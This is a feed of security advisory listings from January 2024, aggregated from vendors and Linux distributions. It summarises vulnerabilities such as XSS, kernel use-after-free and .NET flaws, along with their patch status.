10.01.2024 18:00:00	cisco	[CISCO-SA-BROADWORKS-XSS-6SYJ82JU] Cisco BroadWorks Application Delivery Platform and Xtended Services Platform Stored Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-BROADWORKS-XSS-6SYJ82JU
10.01.2024 18:00:00	cisco	[CISCO-SA-ISE-XSS-BL4VTML] Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to perform a stored cross-site scripting (XSS) attack against a user of the interface on an affected device.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-XSS-BL4VTML
10.01.2024 15:39:55	ubuntu	[USN-6575-1] Twisted vulnerabilities (medium)	Several security issues were fixed in Twisted.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6575-1
10.01.2024 15:10:15	ubuntu	[USN-6541-2] GNU C Library regression	USN-6541-1 introduced a regression in the GNU C Library.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6541-2
10.01.2024 02:00:00	cisa	[CISA-2024:0110] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0110
10.01.2024 02:00:00	debian	[DSA-5598-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5598-1
10.01.2024 02:00:00	gentoo	[GLSA-202401-13] FAAD2: Multiple Vulnerabilities (low)	Multiple denial of service vulnerabilities have been found in FAAD2.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-13
10.01.2024 02:00:00	gentoo	[GLSA-202401-14] RedCloth: ReDoS Vulnerability (low)	A denial of service vulnerability has been found in RedCloth.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-14
10.01.2024 02:00:00	oraclelinux	[ELSA-2024-0071] squid security update (important)	[7:5.5-6.0.1.el9_3.5]- squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)- squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)- squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)- squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0071
10.01.2024 02:00:00	oraclelinux	[ELSA-2024-0114] python3 security update (moderate)	[3.6.8-56.0.1.2]- Add Oracle Linux distribution in platform.py [Orabug: 20812544][3.6.8-56.2]- Security fix for CVE-2022-48560 Resolves: rhbz#2249755- Security fix for CVE-2022-48564 Resolves: rhbz#2249750	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0114
10.01.2024 02:00:00	oraclelinux	[ELSA-2024-0116] python-urllib3 security update (moderate)	[1.24.2-5.0.1.2]- set RECENT_DATE to 01/30/2019 to make checks happy [Orabug: 30228991][1.24.2-5.2]- Security fix for CVE-2023-45803 Resolves: rhbz#2246840- Security fix for CVE-2023-43804 Resolves: rhbz#2242493	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0116
10.01.2024 02:00:00	oraclelinux	[ELSA-2024-0119] libxml2 security update (moderate)	[2.9.7-18]- Fix CVE-2023-39615 (RHEL-5179)[2.9.7-17]- Fix CVE-2023-28484 (#2186692)- Fix CVE-2023-29469 (#2186692)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0119
10.01.2024 02:00:00	oraclelinux	[ELSA-2024-0145] ipa security update (moderate)	[4.6.8-5.0.1]- Blank out header-logo.png product-name.png- Replace login-screen-logo.png [Orabug: 20362818][4.6.8-5.el7_9.16]- Resolves: RHEL-12570 ipa: Invalid CSRF protection	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0145
10.01.2024 02:00:00	redhat	[RHSA-2024:0145] ipa security update (moderate)	Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.Security Fix(es):* ipa: Invalid CSRF protection (CVE-2023-5455)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0145
10.01.2024 02:00:00	redhat	[RHSA-2024:0105] nss security update (moderate)	Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.Security Fix(es):* nss: timing attack against RSA decryption (CVE-2023-5388)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0105
10.01.2024 02:00:00	redhat	[RHSA-2024:0116] python-urllib3 security update (moderate)	The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities.Security Fix(es):* python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)* urllib3: Request body not stripped after redirect from 303 status changes request method to GET (CVE-2023-45803)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0116
10.01.2024 02:00:00	redhat	[RHSA-2024:0119] libxml2 security update (moderate)	The libxml2 library is a development toolbox providing the implementation of various XML standards.Security Fix(es):* libxml2: crafted xml can cause global buffer overflow (CVE-2023-39615)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0119
10.01.2024 02:00:00	redhat	[RHSA-2024:0128] tigervnc security update (important)	Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.Security Fix(es):* xorg-x11-server: Out-of-bounds write in XIChangeDeviceProperty/RRChangeOutputProperty (CVE-2023-5367)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0128
10.01.2024 02:00:00	redhat	[RHSA-2024:0131] pixman security update (moderate)	Pixman is a pixel manipulation library for the X Window System and Cairo.Security Fix(es):* pixman: Integer overflow in pixman_sample_floor_y leading to heap out-of-bounds write (CVE-2022-44638)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0131
10.01.2024 02:00:00	redhat	[RHSA-2024:0133] fence-agents security update (moderate)	The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* python-certifi: Removal of e-Tugra root certificate (CVE-2023-37920)* python-urllib3: Cookie request header isn't stripped during cross-origin redirects (CVE-2023-43804)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0133
10.01.2024 02:00:00	redhat	[RHSA-2024:0135] virt:rhel and virt-devel:rhel security update (moderate)	Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.Security Fix(es):* QEMU: e1000e: heap use-after-free in e1000e_write_packet_to_guest() (CVE-2023-3019)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0135
10.01.2024 02:00:00	redhat	[RHSA-2024:0143] idm:DL1 security update (moderate)	Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Security Fix(es):* Kerberos: delegation constrain bypass in S4U2Proxy (CVE-2020-17049)* ipa: Invalid CSRF protection (CVE-2023-5455)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0143
10.01.2024 02:00:00	redhat	[RHSA-2024:0155] gnutls security update (moderate)	The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.Security Fix(es):* gnutls: timing side-channel in the RSA-PSK authentication (CVE-2023-5981)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0155
10.01.2024 02:00:00	redhat	[RHSA-2024:0108] nss security update (moderate)	Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.Security Fix(es):* nss: timing attack against RSA decryption (CVE-2023-5388)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0108
10.01.2024 02:00:00	redhat	[RHSA-2024:0141] ipa security update (moderate)	Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.Security Fix(es):* ipa: Invalid CSRF protection (CVE-2023-5455)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0141
10.01.2024 02:00:00	redhat	[RHSA-2024:0113] kernel security update (important)	The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)* kernel: vmwgfx: reference count issue leads to use-after-free in surface handling (CVE-2023-5633)* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)* Kernel: UAF during login when accessing the shost ipaddress (CVE-2023-2162)* hw amd: Return Address Predictor vulnerability leading to information disclosure (CVE-2023-20569)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* Backport OVS l4 Symmetric Hashing to rhel-8 (JIRA:RHEL-12746)* Unbounded memory usage by TCP for receive buffers (JIRA:RHEL-15096)* various kind of guests freeze on rhel 8.8 (JIRA:RHEL-15121)* RHEL 8: netfilter: conntrack: Fix gre tunneling over ipv6 (JIRA:RHEL-15259)* NFSv4.1 needs to handle ENOENT error from GETDEVICEINFO (JIRA:RHEL-16407)* DM multipath showing failed path for an nvme-o-FC LUN when performing I/O operations (JIRA:RHEL-14718)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0113
10.01.2024 02:00:00	redhat	[RHSA-2024:0114] python3 security update (moderate)	Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: use after free in heappushpop() of heapq module (CVE-2022-48560)* python: DoS when processing malformed Apple Property List files in binary format (CVE-2022-48564)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0114
10.01.2024 02:00:00	redhat	[RHSA-2024:0121] container-tools:4.0 security update (moderate)	The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879)* golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters (CVE-2022-2880)* golang: net/http: handle server errors after sending GOAWAY (CVE-2022-27664)* golang: regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)* golang: crypto/tls: slow verification of certificate chains containing large RSA keys (CVE-2023-29409)* golang: html/template: improper handling of HTML-like comments within script contexts (CVE-2023-39318)* golang: html/template: improper handling of special tags within script contexts (CVE-2023-39319)* golang: crypto/tls: panic when processing post-handshake message on QUIC connections (CVE-2023-39321)* golang: crypto/tls: lack of a limit on buffered post-handshake (CVE-2023-39322)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0121
10.01.2024 02:00:00	redhat	[RHSA-2024:0125] tomcat security update (moderate)	Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.Security Fix(es):* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)* tomcat: FileUpload: DoS due to accumulation of temporary files on Windows (CVE-2023-42794)* tomcat: improper cleaning of recycled objects could lead to information leak (CVE-2023-42795)* tomcat: incorrectly parsed http trailer headers can cause request smuggling (CVE-2023-45648)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0125
10.01.2024 02:00:00	redhat	[RHSA-2024:0130] frr security update (moderate)	FRRouting is free software that manages TCP/IP based routing protocols. It supports BGP4, OSPFv2, OSPFv3, ISIS, RIP, RIPng, PIM, NHRP, PBR, EIGRP and BFD. Security Fix(es):* ffr: Flowspec overflow in bgpd/bgp_flowspec.c (CVE-2023-38406)* ffr: Out of bounds read in bgpd/bgp_label.c (CVE-2023-38407)* frr: crash from specially crafted MP_UNREACH_NLRI-containing BGP UPDATE message (CVE-2023-47234)* frr: crash from malformed EOR-containing BGP UPDATE message (CVE-2023-47235)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0130
10.01.2024 02:00:00	redhat	[RHSA-2024:0134] kernel-rt security update (important)	The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)* kernel: vmwgfx: reference count issue leads to use-after-free in surface handling (CVE-2023-5633)* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)* Kernel: UAF during login when accessing the shost ipaddress (CVE-2023-2162)* hw amd: Return Address Predictor vulnerability leading to information disclosure (CVE-2023-20569)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* kernel-rt: update RT source tree to the latest RHEL-8.9.z1 Batch (JIRA:RHEL-17347)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0134
10.01.2024 02:00:00	redhat	[RHSA-2024:0150] .NET 8.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.101 and .NET Runtime 8.0.1.Security Fix(es):* dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056)* dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057)* dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0150
10.01.2024 02:00:00	redhat	[RHSA-2024:0157] .NET 7.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.115 and .NET Runtime 7.0.15.Security Fix(es):* dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056)* dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057)* dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0157
10.01.2024 02:00:00	redhat	[RHSA-2024:0158] .NET 6.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.126 and .NET Runtime 6.0.26.Security Fix(es):* dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056)* dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057)* dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0158
10.01.2024 02:00:00	redhat	[RHSA-2024:0151] .NET 7.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.115 and .NET Runtime 7.0.15.Security Fix(es):* dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056)* dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057)* dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0151
10.01.2024 02:00:00	redhat	[RHSA-2024:0152] .NET 8.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.101 and .NET Runtime 8.0.1.Security Fix(es):* dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056)* dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057)* dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0152
10.01.2024 02:00:00	redhat	[RHSA-2024:0156] .NET 6.0 security update (important)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.126 and .NET Runtime 6.0.26.Security Fix(es):* dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056)* dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057)* dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0156
10.01.2024 10:00:00	msrc	[MS:CVE-2024-20666] BitLocker Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20666
10.01.2024 10:00:00	msrc	[MS:CVE-2024-21307] Remote Desktop Client Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21307
10.01.2024 14:32:59	rubysec	[RUBYSEC:VIEW_COMPONENT-2024-21636] view_component Cross-site Scripting vulnerability (medium)	### Impact_What kind of vulnerability is it? Who is impacted?_This is an XSS vulnerability that has the potential to impactanyone rendering a component directly from a controller with theview_component gem. Note that only components that define a[`#call` method](https://viewcomponent.org/guide/templates.html#call)(i.e. instead of using a sidecar template) are affected. The returnvalue of the `#call` method is not sanitized and can includeuser-defined content.In addition, the return value of the[`#output_postamble` method](https://viewcomponent.org/api.html#output_postamble--string)is not sanitized, which can also lead to XSS issues.### Patches_Has the problem been patched? What versions should users upgrade to?_Versions 3.9.0 has been released and fully mitigates both the`#call` and the `#output_postamble` vulnerabilities.### Workarounds_Is there a way for users to fix or remediate the vulnerabilitywithout upgrading?_Sanitize the return value of `#call`, eg:```rubyclass MyComponent < ApplicationComponent def call html_escape("<div>#{user_input}</div>") endend```### References_Are there any links users can visit to find out more?_https://github.com/ViewComponent/view_component/pull/1950### For more informationIf you have any questions or comments about this advisory:Open an issue in the[github/view_component](https://github.com/github/view_component) project.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:VIEW_COMPONENT-2024-21636
11.01.2024 20:40:56	msrc	[MS:CVE-2024-0333] Chromium: CVE-2024-0333 Insufficient data validation in Extensions		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0333
11.01.2024 19:53:50	ubuntu	[USN-6579-1] Xerces-C++ vulnerability (high)	Xerces-C++ could be made to crash or run programs if it opened a speciallycrafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6579-1
11.01.2024 18:53:56	ubuntu	[USN-6560-2] OpenSSH vulnerabilities (medium)	Several security issues were fixed in OpenSSH.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6560-2
11.01.2024 17:44:28	ubuntu	[USN-6578-1] .NET vulnerabilities (critical)	Several security issues were fixed in dotnet6, dotnet7, and dotnet8.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6578-1
11.01.2024 10:00:00	msrc	[MS:CVE-2024-20675] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20675
11.01.2024 10:00:00	msrc	[MS:CVE-2023-48631] Adobe Systems Incorporated: CVE-2023-Improper Input Validation Denial of Service Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2023-48631
11.01.2024 10:00:00	msrc	[MS:CVE-2024-20709] Adobe Systems Incorporated: CVE-2024-20709 Javascript Implementation PDF Vulnerability		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20709
11.01.2024 10:00:00	msrc	[MS:CVE-2024-21337] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21337
11.01.2024 07:30:24	ubuntu	[USN-6574-1] Go vulnerabilities (high)	Several security issues were fixed in Go.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6574-1
11.01.2024 05:08:42	ubuntu	[USN-6562-2] Firefox regressions	USN-6562-1 caused some minor regressions in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6562-2
11.01.2024 02:00:00	oraclelinux	[ELSA-2024-0125] tomcat security update (moderate)	[1:9.0.62-27.2]- Open Redirect vulnerability in FORM authentication (CVE-2023-41080)- FileUpload: DoS due to accumulation of temporary files on Windows (CVE-2023-42794)- improper cleaning of recycled objects could lead to information leak (CVE-2023-42795)- incorrectly parsed http trailer headers can cause request smuggling (CVE-2023-45648)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0125
11.01.2024 02:00:00	oraclelinux	[ELSA-2024-0131] pixman security update (moderate)	[0.38.4-3]- Security fix for CVE-2022-44638	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0131
11.01.2024 02:00:00	oraclelinux	[ELSA-2024-0141] ipa security update (moderate)	[4.10.2-5.0.1]- Resolves: 2242828 Invalid CSRF protection (CVE-2023-5455)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0141
13.01.2024 00:33:03	npm	[NPM:GHSA-Q6W5-JG5Q-47VG] @clerk/nextjs auth() and getAuth() methods vulnerable to insecure direct object reference (IDOR) (critical)	### ImpactUnauthorized access or privilege escalation due to a logic flaw in `auth()` in the App Router or `getAuth()` in the Pages Router.### Affected VersionsAll applications that that use `@clerk/nextjs` versions in the range of `>= 4.7.0`,`< 4.29.3` in a Next.js backend to authenticate API Routes, App Router, or Route handlers. Specifically, those that call `auth()` in the App Router or `getAuth()` in the Pages Router. Only the `@clerk/nextjs` SDK is impacted. Other SDKs, including other Javascript-based SDKs, are not impacted.### PatchesFix included in `@clerk/nextjs@4.29.3`.### References- https://clerk.com/changelog/2024-01-12- https://github.com/clerk/javascript/releases/tag/%40clerk%2Fnextjs%404.29.3	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-Q6W5-JG5Q-47VG
12.01.2024 13:15:12	alpinelinux	[ALPINE:CVE-2023-49568] nfpm vulnerability (high)	[From CVE-2023-49568] A denial of service (DoS) vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in go-git clients.Applications using only the in-memory filesystem supported by go-git are not affected by this vulnerability.This is a go-git implementation issue and does not affect the upstream git cli.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-49568
12.01.2024 02:00:00	debian	[DSA-5599-1] phpseclib (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5599-1
12.01.2024 02:00:00	debian	[DSA-5600-1] php-phpseclib (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5600-1
12.01.2024 02:00:00	debian	[DSA-5601-1] php-phpseclib3 (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5601-1
12.01.2024 02:00:00	gentoo	[GLSA-202401-16] FreeRDP: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in FreeRDP, the worst of which could result in code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-16
12.01.2024 02:00:00	gentoo	[GLSA-202401-15] Prometheus SNMP Exporter: Basic Authentication Bypass (low)	A vulnerability has been found in Prometheus SNMP Exporter which could allow for authentication bypass.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-15
12.01.2024 02:00:00	oraclelinux	[ELSA-2024-0130] frr security update (moderate)	[7.5.1-13.3]- Resolves: RHEL-15916 - Flowspec overflow in bgpd/bgp_flowspec.c- Resolves: RHEL-15919 - Out of bounds read in bgpd/bgp_label.c- Resolves: RHEL-15869 - crash from specially crafted MP_UNREACH_NLRI-containing BGP UPDATE message- Resolves: RHEL-15868 - crash from malformed EOR-containing BGP UPDATE message	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0130
12.01.2024 02:00:00	oraclelinux	[ELSA-2024-0156] .NET 6.0 security update (important)	[6.0.126-1.0.1]- Add support for Oracle Linux[6.0.126-1]- Update to .NET SDK 6.0.126 and Runtime 6.0.26[6.0.125-1]- Update to .NET SDK 6.0.125 and Runtime 6.0.25	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0156
11.01.2024 21:42:19	almalinux	[ALSA-2024:0155] gnutls security update (moderate)	gnutls security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0155
12.01.2024 13:58:47	almalinux	[ALSA-2024:0119] libxml2 security update (moderate)	libxml2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0119
11.01.2024 22:31:01	almalinux	[ALSA-2024:0131] pixman security update (moderate)	pixman security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0131
12.01.2024 14:11:15	almalinux	[ALSA-2024:0105] nss security update (moderate)	nss security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0105
12.01.2024 00:26:04	almalinux	[ALSA-2024:0141] ipa security update (moderate)	ipa security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0141
11.01.2024 21:02:02	almalinux	[ALSA-2024:0157] .NET 7.0 security update (important)	.NET 7.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0157
11.01.2024 22:16:03	almalinux	[ALSA-2024:0150] .NET 8.0 security update (important)	.NET 8.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0150
12.01.2024 00:19:35	almalinux	[ALSA-2024:0156] .NET 6.0 security update (important)	.NET 6.0 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0156
13.01.2024 01:22:11	maven	[MAVEN:GHSA-RWF9-8FQR-P44M] Qualys Jenkins Plugin for Policy Compliance Cross-site Scripting vulnerability (moderate)	Qualys Jenkins Plugin for Policy Compliance prior to version and including 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access and access to configure or edit jobs to utilize the plugin to configure a potential rouge endpoint via which it was possible to control response for certain request which could be injected with XSS payloads leading to XSS while processing the response data.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RWF9-8FQR-P44M
